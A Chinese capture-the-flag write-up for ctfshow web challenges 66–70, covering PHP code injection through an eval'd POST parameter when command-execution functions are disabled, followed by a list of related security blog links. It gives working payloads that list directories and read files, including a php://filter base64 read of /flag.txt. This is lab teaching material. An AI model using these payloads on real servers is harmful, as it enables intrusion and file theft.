ctfshow(66->70)--RCE/命令执行漏洞--禁用命令执行函数

Web66

源代码:

复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

代码审计:

POST传参c,eval进行代码执行。

思路:

由于题目过滤了命令执行函数,所以使用其他方法进行RCE。

先使用c=var_dump(scandir("."))查看当前目录下的文件,发现了flag.php
highlight_file('flag.php')查看发现没有flag.

于是使用c=var_dump(scandir("/"))查看根目录,发现flag.txt

EXP:

复制代码
c=highlight_file('/flag.php');

得到flag.

Web67

与上一题做法相同。

Web68

进入界面,回显为一个报错:

代码审计:

说明highlight_file()函数被禁用了。

思路:

用php伪协议查看文件内容。

EXP:

复制代码
c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=/flag.txt

base64解码得到flag.

Web69

回显与上一题相同。

思路

查看目录下的文件:

复制代码
c=var_dump(scandir("/"));
c=print_r(scandir("/"));

发现两个打印函数都被过滤了。

替换为var_export或implode即可。

EXP:

查看目录:

复制代码
c=var_export(scandir("/"));
c=echo implode("--",scandir("/"));

读取文件内容:

复制代码
c=include("/flag.txt");

Web 70

与上一题做法相同。

相关推荐
神经毒素36 分钟前
WEB安全--Java安全--shiro550反序列化漏洞
java·安全·web安全·shiro
2501_915909061 小时前
开发日常中的抓包工具经验谈:Charles 抓包工具与其它选项对比
websocket·网络协议·tcp/ip·http·网络安全·https·udp
mooyuan天天1 小时前
SQL注入报错“Illegal mix of collations for operation ‘UNION‘”解决办法
数据库·web安全·sql注入·dvwa靶场·sql报错
一口一个橘子1 小时前
[ctfshow web入门] web77
前端·web安全·网络安全
Johny_Zhao2 小时前
Vmware workstation安装部署微软SCCM服务系统
网络·人工智能·python·sql·网络安全·信息安全·微软·云计算·shell·系统运维·sccm
阿斯顿法国红酒快3 小时前
Windows系统安全加固
网络·windows·安全·网络安全·系统安全·ddos
一口一个橘子3 小时前
[ctfshow web入门] web118
前端·web安全·网络安全
kp000004 小时前
PHP弱类型安全漏洞解析与防范指南
android·开发语言·安全·web安全·php·漏洞
Hello.Reader6 小时前
EDR与XDR如何选择适合您的网络安全解决方案
安全·web安全
cooldream20096 小时前
信息安全的基石:深入理解五大核心安全服务
数据库·安全·系统架构师